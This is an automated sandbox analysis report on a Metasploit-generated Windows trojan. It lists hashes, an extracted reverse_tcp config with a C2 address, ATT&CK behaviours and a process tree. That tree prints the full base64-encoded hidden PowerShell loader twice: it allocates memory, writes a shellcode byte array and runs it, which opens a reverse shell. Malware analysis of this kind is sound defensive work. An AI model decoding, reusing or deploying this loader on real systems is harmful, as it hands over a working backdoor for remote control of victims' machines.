metasploit | 690f3afd44a9fdf735cee163a26b2b5cccdb49d6802713868ddb6a4342dc21b6

General

Target

964bc106798c2cfb951a19f8e59e1fcb5510ac23.exe
Size

17KB
MD5

b236486f7756776b56c743c03f7a106e
SHA1

964bc106798c2cfb951a19f8e59e1fcb5510ac23
SHA256

690f3afd44a9fdf735cee163a26b2b5cccdb49d6802713868ddb6a4342dc21b6
SHA512

42f3181244cb3d03cc5f08ede2dea275fadf2f3072f41c06eb8b3ffde3c33ad8fbbd8fb5a47f342b05664b6b553f3d330eb3610e61ff039cb0c1b0195572757d
SSDEEP

384:YfjcjwcOkjc5lPvL/c1fcrj8coFHPAel1rpI2cl1caXUCcYUlkX3nfT0f:ejcjwc1jc5B/c1fcrj8cccl1caXHc2X6

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

192.168.18.106:4535

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2840 powershell.exe

pid	process
2840	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

csc.execvtres.exepowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2840 powershell.exe
2960 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2840 powershell.exe
Token: SeDebugPrivilege 2960 powershell.exe

pid	process
2840	powershell.exe
2960	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2840	powershell.exe
Token: SeDebugPrivilege	2960	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

964bc106798c2cfb951a19f8e59e1fcb5510ac23.execmd.exepowershell.exepowershell.execsc.exe

description	pid	process	target process
PID 2316 wrote to memory of 2028	2316	964bc106798c2cfb951a19f8e59e1fcb5510ac23.exe	cmd.exe
PID 2316 wrote to memory of 2028	2316	964bc106798c2cfb951a19f8e59e1fcb5510ac23.exe	cmd.exe
PID 2316 wrote to memory of 2028	2316	964bc106798c2cfb951a19f8e59e1fcb5510ac23.exe	cmd.exe
PID 2028 wrote to memory of 2840	2028	cmd.exe	powershell.exe
PID 2028 wrote to memory of 2840	2028	cmd.exe	powershell.exe
PID 2028 wrote to memory of 2840	2028	cmd.exe	powershell.exe
PID 2840 wrote to memory of 2960	2840	powershell.exe	powershell.exe
PID 2840 wrote to memory of 2960	2840	powershell.exe	powershell.exe
PID 2840 wrote to memory of 2960	2840	powershell.exe	powershell.exe
PID 2840 wrote to memory of 2960	2840	powershell.exe	powershell.exe
PID 2960 wrote to memory of 2660	2960	powershell.exe	csc.exe
PID 2960 wrote to memory of 2660	2960	powershell.exe	csc.exe
PID 2960 wrote to memory of 2660	2960	powershell.exe	csc.exe
PID 2960 wrote to memory of 2660	2960	powershell.exe	csc.exe
PID 2660 wrote to memory of 2768	2660	csc.exe	cvtres.exe
PID 2660 wrote to memory of 2768	2660	csc.exe	cvtres.exe
PID 2660 wrote to memory of 2768	2660	csc.exe	cvtres.exe
PID 2660 wrote to memory of 2768	2660	csc.exe	cvtres.exe

C:\Users\Admin\AppData\Local\Temp\964bc106798c2cfb951a19f8e59e1fcb5510ac23.exe
"C:\Users\Admin\AppData\Local\Temp\964bc106798c2cfb951a19f8e59e1fcb5510ac23.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAB3AGEARABpACAAPQAgACcAJAAwAFIAQwAyACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkADAAUgBDADIAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZAA5ACwAMAB4AGMAOQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgAYgA4ACwAMAB4ADgAOAAsADAAeAA5AGQALAAwAHgAMABiACwAMAB4AGMANwAsADAAeAA1AGUALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA0ADYALAAwAHgAMQA3ACwAMAB4ADAAMwAsADAAeAA0ADYALAAwAHgAMQA3ACwAMAB4ADgAMwAsADAAeAA0AGUALAAwAHgAOQA5ACwAMAB4AGUAOQAsADAAeAAzADIALAAwAHgAYgAyACwAMAB4ADQAYQAsADAAeAA2ADIALAAwAHgAYgBjACwAMAB4ADQAYQAsADAAeAA4AGIALAAwAHgAMQBkACwAMAB4ADMANAAsADAAeABhAGYALAAwAHgAYgBhACwAMAB4ADAAZgAsADAAeAAyADIALAAwAHgAYQA0ACwAMAB4AGUAZgAsADAAeAA5AGYALAAwAHgAMgAwACwAMAB4AGUAOAAsADAAeAAwADMALAAwAHgANgBiACwAMAB4ADYANAAsADAAeAAxADgALAAwAHgAOQA3ACwAMAB4ADEAOQAsADAAeABhADEALAAwAHgAMgBmACwAMAB4ADEAMAAsADAAeAA5ADcALAAwAHgAOQA3ACwAMAB4ADEAZQAsADAAeABhADEALAAwAHgAMQA5ACwAMAB4ADEAOAAsADAAeABjAGMALAAwAHgANgAxACwAMAB4ADMAYgAsADAAeABlADQALAAwAHgAMABlACwAMAB4AGIANgAsADAAeAA5AGIALAAwAHgAZAA1ACwAMAB4AGMAMQAsADAAeABjAGIALAAwAHgAZABhACwAMAB4ADEAMgAsADAAeAA5ADQALAAwAHgAYQA2ACwAMAB4ADMAMwAsADAAeABjAGUALAAwAHgAYQBkACwAMAB4ADEAYgAsADAAeABkAGMALAAwAHgAYgA4ACwAMAB4ADMAYQAsADAAeABkADkALAAwAHgAZQAwACwAMAB4ADQANwAsADAAeABlAGMALAAwAHgANQA1ACwAMAB4ADUAOAAsADAAeAAzADAALAAwAHgAOAA5ACwAMAB4AGEAYQAsADAAeAAyAGQALAAwAHgAOABjACwAMAB4ADkAMAAsADAAeABmAGEALAAwAHgANAA1ACwAMAB4ADQANAAsADAAeAA4AGEALAAwAHgANwAxACwAMAB4ADAAMQAsADAAeAA3ADUALAAwAHgAYQBiACwAMAB4ADUANgAsADAAeABlADIALAAwAHgAZgAwACwAMAB4ADYAMgAsADAAeAAyAGMALAAwAHgAMwBmACwAMAB4AGMAYQAsADAAeAA4AGIALAAwAHgAOAA0ACwAMAB4AGIANAAsADAAeAAxADgALAAwAHgAZgA4ACwAMAB4ADEANgAsADAAeAAxAGQALAAwAHgANQAxACwAMAB4ADMAZQAsADAAeABiADQALAAwAHgANgAwACwAMAB4ADUAZAAsADAAeABiADMALAAwAHgAYwA0ACwAMAB4AGEANQAsADAAeAA1AGEALAAwAHgAMgBiACwAMAB4AGIAMwAsADAAeABkAGQALAAwAHgAOQA4ACwAMAB4AGQANgAsADAAeABjADQALAAwAHgAMgA1ACwAMAB4AGUAMgAsADAAeAAwAGMALAAwAHgANAAwACwAMAB4AGIAYQAsADAAeAA0ADQALAAwAHgAYwA3ACwAMAB4AGYAMgAsADAAeAAxAGUALAAwAHgANwA0ACwAMAB4ADAANAAsADAAeAA2ADQALAAwAHgAZAA0ACwAMAB4ADcAYQAsADAAeABlADEALAAwAHgAZQAyACwAMAB4AGIAMgAsADAAeAA5AGUALAAwAHgAZgA0ACwAMAB4ADIANwAsADAAeABjADkALAAwAHgAOQBiACwAMAB4ADcAZAAsADAAeABjADYALAAwAHgAMQBlACwAMAB4ADIAYQAsADAAeABjADUALAAwAHgAZQBkACwAMAB4AGIAYQAsADAAeAA3ADYALAAwAHgAOQBlACwAMAB4ADgAYwAsADAAeAA5AGIALAAwAHgAZAAyACwAMAB4ADcAMQAsADAAeABiADAALAAwAHgAZgBjACwAMAB4AGIAYgAsADAAeAAyAGUALAAwAHgAMQA0ACwAMAB4ADcANgAsADAAeAAyADkALAAwAHgAMwA5ACwAMAB4ADIAOAAsADAAeAA3ADcALAAwAHgAYgAxACwAMAB4ADQANgAsADAAeAA3ADQALAAwAHgAZQAwACwAMAB4ADcAZAAsADAAeAA4AGEALAAwAHgAOAA3ACwAMAB4AGYAMAAsADAAeABlADkALAAwAHgAOQBkACwAMAB4AGYANAAsADAAeABjADIALAAwAHgAYgA2ACwAMAB4ADMANQAsADAAeAA5ADMALAAwAHgANgBlACwAMAB4ADMAZQAsADAAeAA5ADMALAAwAHgANgA0ACwAMAB4AGUANgAsADAAeAAyADgALAAwAHgAMgA0ACwAMAB4AGIAYQAsADAAeAA0ADAALAAwAHgAMwA4ACwAMAB4AGQAYgAsADAAeAAzAGIALAAwAHgAYgAxACwAMAB4ADEAMAAsADAAeAAxAGYALAAwAHgANgBmACwAMAB4AGUAMQAsADAAeAAwAGEALAAwAHgAYgA2ACwAMAB4ADEAMAAsADAAeAA2AGEALAAwAHgAYwBiACwAMAB4ADMANwAsADAAeABjADUALAAwAHgAMAA3ACwAMAB4AGMAMQAsADAAeABhAGYALAAwAHgAMgA2ACwAMAB4ADcAZgAsADAAeABjADcALAAwAHgANAA1ACwAMAB4AGMAZgAsADAAeAA4ADIALAAwAHgAZQA4ACwAMAB4ADgAOAAsADAAeABiADgALAAwAHgAMABhACwAMAB4ADAAZQAsADAAeABmAGEALAAwAHgAOQA2ACwAMAB4ADUAYwAsADAAeAA5AGYALAAwAHgAYgBhACwAMAB4ADQANgAsADAAeAAxAGQALAAwAHgANABmACwAMAB4ADUAMgAsADAAeAA4AGQALAAwAHgAOQAyACwAMAB4AGIAMAAsADAAeAA0ADIALAAwAHgAYQBlACwAMAB4ADcAOAAsADAAeABkADkALAAwAHgAZQA4ACwAMAB4ADQAMQAsADAAeABkADUALAAwAHgAYgAxACwAMAB4ADgANAAsADAAeABmADgALAAwAHgANwBjACwAMAB4ADQAOQAsADAAeAAzADUALAAwAHgAMAA0ACwAMAB4AGEAYgAsADAAeAAzADcALAAwAHgANwA1ACwAMAB4ADgAZQAsADAAeAA1ADgALAAwAHgAYwA3ACwAMAB4ADMAYgAsADAAeAA2ADcALAAwAHgAMQA0ACwAMAB4AGQAYgAsADAAeABhAGIALAAwAHgAOAA3ACwAMAB4ADYAMwAsADAAeAA4ADEALAAwAHgANwBkACwAMAB4ADkANwAsADAAeAA1ADkALAAwAHgAYQBjACwAMAB4ADgAMQAsADAAeAAwAGQALAAwAHgANgA2ACwAMAB4ADYANwAsADAAeABkADYALAAwAHgAYgA5ACwAMAB4ADYANAAsADAAeAA1AGUALAAwAHgAMQAwACwAMAB4ADYANgAsADAAeAA5ADYALAAwAHgAYgA1ACwAMAB4ADIAYgAsADAAeABhAGYALAAwAHgAMAAyACwAMAB4ADcANgAsADAAeAA0ADMALAAwAHgAZAAwACwAMAB4AGMAMgAsADAAeAA3ADYALAAwAHgAOQAzACwAMAB4ADgANgAsADAAeAA4ADgALAAwAHgANwA2ACwAMAB4AGYAYgAsADAAeAA3AGUALAAwAHgAZQA5ACwAMAB4ADIANAAsADAAeAAxAGUALAAwAHgAOAAxACwAMAB4ADIANAAsADAAeAA1ADkALAAwAHgAYgAzACwAMAB4ADEANAAsADAAeABjADcALAAwAHgAMAA4ACwAMAB4ADYAMAAsADAAeABiAGUALAAwAHgAYQBmACwAMAB4AGIANgAsADAAeAA1AGYALAAwAHgAOAA4ACwAMAB4ADYAZgAsADAAeAA0ADgALAAwAHgAOABhACwAMAB4ADAAOAAsADAAeAA1ADMALAAwAHgAOQBmACwAMAB4AGYAMgAsADAAeAA3AGUALAAwAHgAYgBkACwAMAB4ADIAMwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQATwBWAFEASgA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQATwBWAFEASgAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQATwBWAFEASgAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAHcAYQBEAGkAKQApADsAJABFAHYAMwB2ACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAQQBGADAAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAQQBGADAAIAAkAEUAdgAzAHYAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQARQB2ADMAdgAgACQAZQAiADsAfQA=
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2028
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -window hidden -EncodedCommand JAB3AGEARABpACAAPQAgACcAJAAwAFIAQwAyACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkADAAUgBDADIAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZAA5ACwAMAB4AGMAOQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgAYgA4ACwAMAB4ADgAOAAsADAAeAA5AGQALAAwAHgAMABiACwAMAB4AGMANwAsADAAeAA1AGUALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA0ADYALAAwAHgAMQA3ACwAMAB4ADAAMwAsADAAeAA0ADYALAAwAHgAMQA3ACwAMAB4ADgAMwAsADAAeAA0AGUALAAwAHgAOQA5ACwAMAB4AGUAOQAsADAAeAAzADIALAAwAHgAYgAyACwAMAB4ADQAYQAsADAAeAA2ADIALAAwAHgAYgBjACwAMAB4ADQAYQAsADAAeAA4AGIALAAwAHgAMQBkACwAMAB4ADMANAAsADAAeABhAGYALAAwAHgAYgBhACwAMAB4ADAAZgAsADAAeAAyADIALAAwAHgAYQA0ACwAMAB4AGUAZgAsADAAeAA5AGYALAAwAHgAMgAwACwAMAB4AGUAOAAsADAAeAAwADMALAAwAHgANgBiACwAMAB4ADYANAAsADAAeAAxADgALAAwAHgAOQA3ACwAMAB4ADEAOQAsADAAeABhADEALAAwAHgAMgBmACwAMAB4ADEAMAAsADAAeAA5ADcALAAwAHgAOQA3ACwAMAB4ADEAZQAsADAAeABhADEALAAwAHgAMQA5ACwAMAB4ADEAOAAsADAAeABjAGMALAAwAHgANgAxACwAMAB4ADMAYgAsADAAeABlADQALAAwAHgAMABlACwAMAB4AGIANgAsADAAeAA5AGIALAAwAHgAZAA1ACwAMAB4AGMAMQAsADAAeABjAGIALAAwAHgAZABhACwAMAB4ADEAMgAsADAAeAA5ADQALAAwAHgAYQA2ACwAMAB4ADMAMwAsADAAeABjAGUALAAwAHgAYQBkACwAMAB4ADEAYgAsADAAeABkAGMALAAwAHgAYgA4ACwAMAB4ADMAYQAsADAAeABkADkALAAwAHgAZQAwACwAMAB4ADQANwAsADAAeABlAGMALAAwAHgANQA1ACwAMAB4ADUAOAAsADAAeAAzADAALAAwAHgAOAA5ACwAMAB4AGEAYQAsADAAeAAyAGQALAAwAHgAOABjACwAMAB4ADkAMAAsADAAeABmAGEALAAwAHgANAA1ACwAMAB4ADQANAAsADAAeAA4AGEALAAwAHgANwAxACwAMAB4ADAAMQAsADAAeAA3ADUALAAwAHgAYQBiACwAMAB4ADUANgAsADAAeABlADIALAAwAHgAZgAwACwAMAB4ADYAMgAsADAAeAAyAGMALAAwAHgAMwBmACwAMAB4AGMAYQAsADAAeAA4AGIALAAwAHgAOAA0ACwAMAB4AGIANAAsADAAeAAxADgALAAwAHgAZgA4ACwAMAB4ADEANgAsADAAeAAxAGQALAAwAHgANQAxACwAMAB4ADMAZQAsADAAeABiADQALAAwAHgANgAwACwAMAB4ADUAZAAsADAAeABiADMALAAwAHgAYwA0ACwAMAB4AGEANQAsADAAeAA1AGEALAAwAHgAMgBiACwAMAB4AGIAMwAsADAAeABkAGQALAAwAHgAOQA4ACwAMAB4AGQANgAsADAAeABjADQALAAwAHgAMgA1ACwAMAB4AGUAMgAsADAAeAAwAGMALAAwAHgANAAwACwAMAB4AGIAYQAsADAAeAA0ADQALAAwAHgAYwA3ACwAMAB4AGYAMgAsADAAeAAxAGUALAAwAHgANwA0ACwAMAB4ADAANAAsADAAeAA2ADQALAAwAHgAZAA0ACwAMAB4ADcAYQAsADAAeABlADEALAAwAHgAZQAyACwAMAB4AGIAMgAsADAAeAA5AGUALAAwAHgAZgA0ACwAMAB4ADIANwAsADAAeABjADkALAAwAHgAOQBiACwAMAB4ADcAZAAsADAAeABjADYALAAwAHgAMQBlACwAMAB4ADIAYQAsADAAeABjADUALAAwAHgAZQBkACwAMAB4AGIAYQAsADAAeAA3ADYALAAwAHgAOQBlACwAMAB4ADgAYwAsADAAeAA5AGIALAAwAHgAZAAyACwAMAB4ADcAMQAsADAAeABiADAALAAwAHgAZgBjACwAMAB4AGIAYgAsADAAeAAyAGUALAAwAHgAMQA0ACwAMAB4ADcANgAsADAAeAAyADkALAAwAHgAMwA5ACwAMAB4ADIAOAAsADAAeAA3ADcALAAwAHgAYgAxACwAMAB4ADQANgAsADAAeAA3ADQALAAwAHgAZQAwACwAMAB4ADcAZAAsADAAeAA4AGEALAAwAHgAOAA3ACwAMAB4AGYAMAAsADAAeABlADkALAAwAHgAOQBkACwAMAB4AGYANAAsADAAeABjADIALAAwAHgAYgA2ACwAMAB4ADMANQAsADAAeAA5ADMALAAwAHgANgBlACwAMAB4ADMAZQAsADAAeAA5ADMALAAwAHgANgA0ACwAMAB4AGUANgAsADAAeAAyADgALAAwAHgAMgA0ACwAMAB4AGIAYQAsADAAeAA0ADAALAAwAHgAMwA4ACwAMAB4AGQAYgAsADAAeAAzAGIALAAwAHgAYgAxACwAMAB4ADEAMAAsADAAeAAxAGYALAAwAHgANgBmACwAMAB4AGUAMQAsADAAeAAwAGEALAAwAHgAYgA2ACwAMAB4ADEAMAAsADAAeAA2AGEALAAwAHgAYwBiACwAMAB4ADMANwAsADAAeABjADUALAAwAHgAMAA3ACwAMAB4AGMAMQAsADAAeABhAGYALAAwAHgAMgA2ACwAMAB4ADcAZgAsADAAeABjADcALAAwAHgANAA1ACwAMAB4AGMAZgAsADAAeAA4ADIALAAwAHgAZQA4ACwAMAB4ADgAOAAsADAAeABiADgALAAwAHgAMABhACwAMAB4ADAAZQAsADAAeABmAGEALAAwAHgAOQA2ACwAMAB4ADUAYwAsADAAeAA5AGYALAAwAHgAYgBhACwAMAB4ADQANgAsADAAeAAxAGQALAAwAHgANABmACwAMAB4ADUAMgAsADAAeAA4AGQALAAwAHgAOQAyACwAMAB4AGIAMAAsADAAeAA0ADIALAAwAHgAYQBlACwAMAB4ADcAOAAsADAAeABkADkALAAwAHgAZQA4ACwAMAB4ADQAMQAsADAAeABkADUALAAwAHgAYgAxACwAMAB4ADgANAAsADAAeABmADgALAAwAHgANwBjACwAMAB4ADQAOQAsADAAeAAzADUALAAwAHgAMAA0ACwAMAB4AGEAYgAsADAAeAAzADcALAAwAHgANwA1ACwAMAB4ADgAZQAsADAAeAA1ADgALAAwAHgAYwA3ACwAMAB4ADMAYgAsADAAeAA2ADcALAAwAHgAMQA0ACwAMAB4AGQAYgAsADAAeABhAGIALAAwAHgAOAA3ACwAMAB4ADYAMwAsADAAeAA4ADEALAAwAHgANwBkACwAMAB4ADkANwAsADAAeAA1ADkALAAwAHgAYQBjACwAMAB4ADgAMQAsADAAeAAwAGQALAAwAHgANgA2ACwAMAB4ADYANwAsADAAeABkADYALAAwAHgAYgA5ACwAMAB4ADYANAAsADAAeAA1AGUALAAwAHgAMQAwACwAMAB4ADYANgAsADAAeAA5ADYALAAwAHgAYgA1ACwAMAB4ADIAYgAsADAAeABhAGYALAAwAHgAMAAyACwAMAB4ADcANgAsADAAeAA0ADMALAAwAHgAZAAwACwAMAB4AGMAMgAsADAAeAA3ADYALAAwAHgAOQAzACwAMAB4ADgANgAsADAAeAA4ADgALAAwAHgANwA2ACwAMAB4AGYAYgAsADAAeAA3AGUALAAwAHgAZQA5ACwAMAB4ADIANAAsADAAeAAxAGUALAAwAHgAOAAxACwAMAB4ADIANAAsADAAeAA1ADkALAAwAHgAYgAzACwAMAB4ADEANAAsADAAeABjADcALAAwAHgAMAA4ACwAMAB4ADYAMAAsADAAeABiAGUALAAwAHgAYQBmACwAMAB4AGIANgAsADAAeAA1AGYALAAwAHgAOAA4ACwAMAB4ADYAZgAsADAAeAA0ADgALAAwAHgAOABhACwAMAB4ADAAOAAsADAAeAA1ADMALAAwAHgAOQBmACwAMAB4AGYAMgAsADAAeAA3AGUALAAwAHgAYgBkACwAMAB4ADIAMwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQATwBWAFEASgA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQATwBWAFEASgAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQATwBWAFEASgAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAHcAYQBEAGkAKQApADsAJABFAHYAMwB2ACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAQQBGADAA